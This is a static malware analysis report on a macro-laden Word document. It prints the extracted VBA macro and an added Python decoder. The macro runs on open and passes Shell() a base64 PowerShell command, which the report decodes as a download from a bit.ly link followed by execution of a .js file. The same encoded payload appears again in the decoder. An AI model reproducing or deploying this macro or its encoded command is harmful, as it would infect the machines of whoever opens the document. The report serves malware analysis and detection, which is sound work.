Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 52caad21679a7299…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 19.1 KB
Created: 2021-05-28 03:46:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2021-06-17
MD5: 1486d228b1e1d0a8903f71427299f29d
SHA-1: bf4b2bc9f1a2c166eaaeb503b375ab53309df36e
SHA-256: 52caad21679a7299228a977d0085ac8eba040e275ba9bdddd9c8b6e783efcd93
Risk score: 162

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1059 Command and Scripting Interpreter

The sample is an OOXML Word document whose VBA project contains a Document_Open handler, so the macro runs as soon as the document is opened with macros enabled. Document_Open calls HFvgRkvc, which assembles a command line and passes it to Shell(). Most of the module is padding: CGBsM, hObbgtiKWjIjZKhgCyedidBXthWIxjNQdpmtdzmNXw and piEPtmHORHZnYLBGfLYshYGyGGpRnNsfEJR are never called and consist only of dead assignments. The logic that matters is about twenty lines.

The command is built from the document's Comments and Subject built-in properties (the property name "Subject" is assembled at run time as "Sub" + "jec" + Right("hgfdrtt", 1)), a space, and a hardcoded base64 literal. The property values are not shown in this report; since the literal on its own is not an executable command, the interpreter invocation is most likely stored there (in the OOXML package they live in docProps/core.xml as dc:description and dc:subject). The literal is base64 of UTF-16LE text, the encoding PowerShell's -EncodedCommand switch expects. It decodes to a New-Object Net.WebClient call, with the class name split by backticks and the strings delimited by Unicode curly quotes, that calls DownloadFile on https://bit.ly/3us8d2h, writes the result to $ENv:appdata\mgyqnbed.js and then runs it with Start. The first and last statements only assign a junk string. This is a download-and-execute stage that hands off to a .js second stage, which Windows opens with the Windows Script Host by default. Note that the download URL sits inside the encoded literal and therefore does not appear in the EMBEDDED_URL findings below.

Two details of the Shell() call: bh54r is never assigned, so without Option Explicit it is an Empty Variant; prepending it to the command is a no-op, and passing it as the WindowStyle argument yields 0 (vbHide), so the launched process gets no visible window. On Error Resume Next suppresses any failure, for example when the properties are missing or the download fails.

Heuristics (5)

  • VBA project inside OOXML (medium) OOXML_VBA, 3 related findings
    The document contains a VBA project, i.e. VBA macros are present.
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The macro calls Shell(), i.e. it starts an external process. Here the argument is assembled at run time from document properties and a base64 literal (see the extracted macro below).
  • Document_Open macro (high) OLE_VBA_DOCOPEN
    Auto-executing Document_Open handler: the macro runs when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code/cache) stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels say which channel (macro, JS, link annotation, document body, ...) reached each URL. All 13 URLs below were found in document text (OOXML body / shared strings). They are the standard XML namespace URIs of the OOXML markup, not network indicators; the real download URL is base64-encoded inside the macro and is not in this list.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 3170 bytes
SHA-256: 3c6e7dd67a1b636f0fc6719451257f397b003011c549ee63706a995a04c2cc14
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call HFvgRkvc
End Sub





Attribute VB_Name = "OGIXLGsLk"

Function CGBsM(pNgKUwEQJ, wvpPBmHiGgORfnz, RFWbmpCuZouEshKAbXTrkcLTLErfsXhsLg, zticGtuqNsDpYVOqHUHDotDPixW)
KGsvMy = 1.70355928665325E+33
mybIOSJdhaXDdqFqTuJWsoGqKdVLIxLIJNBv = "GTeMYUgepjMFPZBDbxyrkylxy"
kOPtPoKOMaeKUTaMVuJF = "XKFhPDDrIhhNDkROvTXuANaYRdfRYdqnsbMEJM"
lHXEtxwQiIxZblLsKjhQmYmTfqtVbYNFjTmmdJhbVMw = "aDPBhjCUcv"
NVDYCDbpKvsqHz = 88592458952#
CGBsM "OBBFuZbdsbarnrWscnGZRZk"
End Function

Function hObbgtiKWjIjZKhgCyedidBXthWIxjNQdpmtdzmNXw(XuWmNiNICIVATWAnmrLxbLnyoCQ, AaHoRX, ADoQJOSpfVVZFmTmaOmCLHYyLSKIbB, jvoAkxaCjJWHcTcKQhngaeUWteqFr, KNeold, mjpzMDspzwfiHubo, HEbSHFHVKfzIdnhyuex)
aXQiSFAwvzTQDMDiyWZNmWsFkXoDCMQGleaAczDCxnR = "JZigZRnqyjMEeLxvR"
tjiMeZmDGyTWPzEbvKoIdlYZICSVVRBIlzthiwuJu = 5.08993129100267E+39
LoXbTMzDPmHJTILIEcGQh = 4.78686816295855E+27
xKlPFWsyQeOHZjBgiGVSBOBbglWZsSCdoWr = "qDGdKRWcvMibGX"
AuPniJJjUASGxbkTDroqfzsHksZgUCuSVZCiYi = 6.90227035784107E+22
DhTmcsLYAKs = 7.01438146604038E+29
jSgOBCIDqkcPRFAkYZCuUilJLMPP = 94352671774#
TYVbXLAoLAgQfTTEEVXraAa = "yKBgXCpmte"
LGotuzwNYWepOSFHqsXyS = 6.13751259384119E+35
NcMJURILuWBwHxPcdsdmCmTVmOSvytWfENtLgkffFM = 2.61194760418261E+24
hObbgtiKWjIjZKhgCyedidBXthWIxjNQdpmtdzmNXw "HoSKHrOPeVgvbIrWFyNMAAVst"
End Function

Sub piEPtmHORHZnYLBGfLYshYGyGGpRnNsfEJR(DvsMyhp, MhUDKDkerKX, SDpOagrAbHSaQDoTW, WzGQwJCBoKcVJLUbm, FemS)
ruJOgvKNjYwPktZTOaHQcGInxqbDPu = "OuTOkCJLmNsOiKZgunZQdCAFlmVRqUH"
pohVRfpQEOVDkradYJgPqdFMuNcygsVRGuYucEPOyI = 6.48637504292417E+26
PgwVuLssgnrHM = 3.10513839415424E+20
VaDCqjMtDxpSgBTuRRhRqfxsinozoe = 4.13598659141732E+35
mMLGdLMIYzWcyfb = 650746113518612#
rZmVZZuspcLTDvMFZiCFUupiFIJ = "UDzMHIxaBJoNRTQAA"
FdnRDPcVKwjDQRQdXmdyLuylDPupoBdpiLDgdDz = "kmxAqytXwovdWChKeBOnVmhJSuUENkz"
End Sub


Public Sub HFvgRkvc()
On Error Resume Next
 nuu = "hgfdrtt"
MMM = Right(nuu, 1)
Dim zzfg
zzfg = "Sub" + "jec" + MMM
 NxSHWIje = ActiveDocument.BuiltInDocumentProperties("Comments")
 lOIMUdk = ActiveDocument.BuiltInDocumentProperties(zzfg)
 bWgKRxTLz = "IAAkAGYAZABzAGYAcwBkAGYAIAA9ACAAIgBmAHMA" & _
"ZgBkAGcAaABmAGQAZABmAGcAaAAiADsAIAAoAE4A" & _
"RQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUA" & _
"YABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAA" & _
"aQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwA" & _
"bwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMA" & _
"OgAvAC8AYgBpAHQALgBsAHkALwAzAHUAcwA4AGQA" & _
"MgBoAB0gIAAsACAAHSAkAEUATgB2ADoAYQBwAHAA" & _
"ZABhAHQAYQBcAG0AZwB5AHEAbgBiAGUAZAAuAGoA" & _
"cwAdICAAKQAgADsAIABzAHQAQQBSAHQAIAAdICQA" & _
"RQBOAHYAOgBhAHAAcABkAGEAdABhAFwAbQBnAHkA" & _
"cQBuAGIAZQBkAC4AagBzAB0gOwAkAGYAZABzAGYA" & _
"cwBkAGYAIAA9ACAAIgBmAHMAZgBkAGcAaABmAGQA" & _
"ZABmAGcAaAAiADsA"
 xYpNRRPpI = NxSHWIje + lOIMUdk + " " + bWgKRxTLz
 tbtVDLfZ = Shell(bh54r + xYpNRRPpI, bh54r)
'0000

End Sub

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 17408 bytes
SHA-256: 353976c45dd3df0932e39fcd927c1c40a4a977174774b28bc854c22b7eda4f30
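To reproduce the decode step for the HFvgRkvc macro, the following Python script is an added example for this report; it is the editor's own code, not part of the original page or of any tool named above. It folds the VBA line continuations, base64-decodes the literal as UTF-16LE, strips the backtick and curly-quote tricks and pulls out the URL and drop path. The VBA text embedded in it is copied from the extracted macros.bas preview; the helper names, the escape-letter set (Windows PowerShell 5.1's) and the IOC patterns are this example's own assumptions.

```python
"""Decode the command that HFvgRkvc() hands to Shell().

Added example for this report (not code from the original page or from any
tool it names). The VBA text below is copied from the extracted macros.bas
preview; helper names, the escape-letter set and the IOC patterns are this
example's own assumptions. Runs offline on the embedded text.
"""
import base64
import re

# Constructed input: the relevant Sub, copied verbatim from macros.bas above.
MACRO_SRC = r'''Public Sub HFvgRkvc()
On Error Resume Next
 nuu = "hgfdrtt"
MMM = Right(nuu, 1)
Dim zzfg
zzfg = "Sub" + "jec" + MMM
 NxSHWIje = ActiveDocument.BuiltInDocumentProperties("Comments")
 lOIMUdk = ActiveDocument.BuiltInDocumentProperties(zzfg)
 bWgKRxTLz = "IAAkAGYAZABzAGYAcwBkAGYAIAA9ACAAIgBmAHMA" & _
"ZgBkAGcAaABmAGQAZABmAGcAaAAiADsAIAAoAE4A" & _
"RQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUA" & _
"YABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAA" & _
"aQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwA" & _
"bwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMA" & _
"OgAvAC8AYgBpAHQALgBsAHkALwAzAHUAcwA4AGQA" & _
"MgBoAB0gIAAsACAAHSAkAEUATgB2ADoAYQBwAHAA" & _
"ZABhAHQAYQBcAG0AZwB5AHEAbgBiAGUAZAAuAGoA" & _
"cwAdICAAKQAgADsAIABzAHQAQQBSAHQAIAAdICQA" & _
"RQBOAHYAOgBhAHAAcABkAGEAdABhAFwAbQBnAHkA" & _
"cQBuAGIAZQBkAC4AagBzAB0gOwAkAGYAZABzAGYA" & _
"cwBkAGYAIAA9ACAAIgBmAHMAZgBkAGcAaABmAGQA" & _
"ZABmAGcAaAAiADsA"
 xYpNRRPpI = NxSHWIje + lOIMUdk + " " + bWgKRxTLz
 tbtVDLfZ = Shell(bh54r + xYpNRRPpI, bh54r)
End Sub
'''

_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*("[^"\n]*"(?:\s*[&+]\s*"[^"\n]*")*)\s*$', re.M)
_B64 = re.compile(r'[A-Za-z0-9+/]{32,}={0,2}')
_PS_ESCAPES = '0abfnrtv'  # Windows PowerShell 5.1 backtick escapes; any other `x is just x


def vba_string_assignments(src):
    """variable -> literal for assignments whose right-hand side is only string
    literals joined with & or +, after folding VBA line continuations (& _)."""
    folded = re.sub(r'\s*&\s*_\s*\r?\n\s*', ' & ', src)
    return {m.group(1): ''.join(re.findall(r'"([^"]*)"', m.group(2)))
            for m in _ASSIGN.finditer(folded)}


def document_property_reads(src):
    """Arguments of BuiltInDocumentProperties() calls: the macro prepends these
    values to the blob, so the launcher text lives in document metadata."""
    return re.findall(r'BuiltInDocumentProperties\(\s*("[^"]*"|\w+)\s*\)', src)


def decode_blob(lit):
    """Base64-decode; treat as UTF-16LE (what PowerShell -EncodedCommand takes)
    when the odd bytes are mostly NUL, else as single-byte text."""
    raw = base64.b64decode(lit)
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode('utf-16-le')
    return raw.decode('latin-1')


def deobfuscate_ps(ps):
    """Undo the cosmetic tricks in this sample: curly Unicode quotes as string
    delimiters and backtick-split identifiers (`N`e`T -> NeT)."""
    ps = re.sub('[\u201c\u201d\u201e]', '"', ps)
    return re.sub(r'`(?![%s])' % _PS_ESCAPES, '', ps)


def extract_iocs(ps):
    """URLs and $env:-relative file paths, de-duplicated in order of appearance."""
    urls = re.findall(r'https?://[^\s"\'<>(),;]+', ps)
    paths = re.findall(r'\$env:\w+\\[\w.\\-]+', ps, re.I)
    return {'urls': list(dict.fromkeys(urls)), 'paths': list(dict.fromkeys(paths))}


def analyze_macro(src):
    """Find the base64 literal, decode it and classify what it does."""
    report = {'blob_var': None, 'decoded': '', 'deobfuscated': '',
              'urls': [], 'paths': [], 'verdict': 'no encoded payload found'}
    for name, lit in vba_string_assignments(src).items():
        if len(lit) % 4 or not _B64.fullmatch(lit):
            continue
        decoded = decode_blob(lit)
        clean = deobfuscate_ps(decoded)
        report.update(blob_var=name, decoded=decoded, deobfuscated=clean,
                      **extract_iocs(clean))
        low = clean.lower()
        if 'downloadfile' in low and re.search(r'\bstart\b|\biex\b|invoke-expression', low):
            report['verdict'] = 'download-and-execute'
        elif 'downloadfile' in low or 'downloadstring' in low:
            report['verdict'] = 'downloader'
        break
    return report


if __name__ == '__main__':
    r = analyze_macro(MACRO_SRC)
    print('blob variable:', r['blob_var'], '| verdict:', r['verdict'])
    print('decoded:', r['deobfuscated'])
    print('metadata reads:', document_property_reads(MACRO_SRC))
    print('urls:', r['urls'], '| paths:', r['paths'])
```

Running it prints the de-obfuscated one-liner, the download URL and the drop path. The Comments and Subject values that the macro prepends are not in the VBA; to recover the full command line, read dc:description and dc:subject from docProps/core.xml of the original document and put them in front of the decoded text. The backtick rule is deliberately the Windows PowerShell 5.1 set: PowerShell 6+ also treats `e and `u as escapes, so the same de-obfuscation would differ there.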